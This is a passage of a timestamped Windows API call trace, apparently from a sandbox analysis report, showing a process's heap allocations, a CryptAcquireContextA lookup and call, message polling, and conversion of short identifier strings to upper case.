[0256.865] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0256.865] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0256.865] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0256.865] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0256.865] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0256.865] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0256.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0256.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0256.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0256.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0256.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0256.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0256.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0256.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0256.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0256.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0256.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0256.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0256.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0256.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0256.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0256.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0256.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0256.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0256.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0256.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0256.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0256.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0256.867] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0256.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0256.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0256.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0256.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0256.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0256.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0256.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0256.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0256.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0256.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0256.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0256.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0256.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0256.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0256.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0256.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0256.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0256.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0256.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0256.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0256.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0256.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0256.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0256.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0256.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0256.869] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0256.869] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2466e10, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0256.870] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0256.870] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0256.870] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContext") returned 0x0 [0256.870] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0256.870] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0256.870] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0256.870] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2466e10, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0256.870] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0256.870] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0256.871] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0256.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0256.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0256.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3538 | out: hHeap=0x25c0000) returned 1 [0256.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0256.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0256.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0256.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0256.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0256.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0256.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0256.871] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xad2698) returned 1 [0256.872] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0256.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0256.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0256.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0256.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0256.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0256.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0256.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0256.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0256.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0256.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0256.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0256.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0256.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0256.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0256.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0256.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0256.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0256.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0256.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0256.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0256.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0256.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0256.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0256.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0256.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0256.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0256.874] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.874] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0256.874] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0256.874] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0256.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0256.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0256.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0256.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0256.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0256.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0256.875] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0256.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0256.875] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0256.875] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0256.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0256.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0256.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0256.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0256.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0256.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0256.876] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0256.876] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0256.876] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0256.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0256.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0256.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0256.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0256.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0256.876] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0256.876] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.876] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.876] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0256.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0256.877] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0256.877] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0256.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0256.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0256.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0256.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0256.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0256.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0256.877] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0256.877] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0256.877] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0256.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0256.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0256.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0256.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0256.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0256.878] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0256.878] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0256.878] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0256.878] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0256.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0256.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0256.878] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0256.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0256.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0256.878] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0256.878] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0256.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0256.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0256.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0256.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0256.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0256.878] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0256.879] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.879] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0256.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0256.879] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0256.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0256.879] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0256.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0256.879] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0256.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0256.879] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0256.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0256.879] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0256.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0256.879] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0256.879] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0256.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0256.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0256.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0256.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0256.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0256.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0256.880] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0256.880] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0256.880] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0256.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0256.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0256.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0256.880] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0256.880] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0256.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0256.880] RtlAllocateHeap (HeapHandle=0x25c0000, 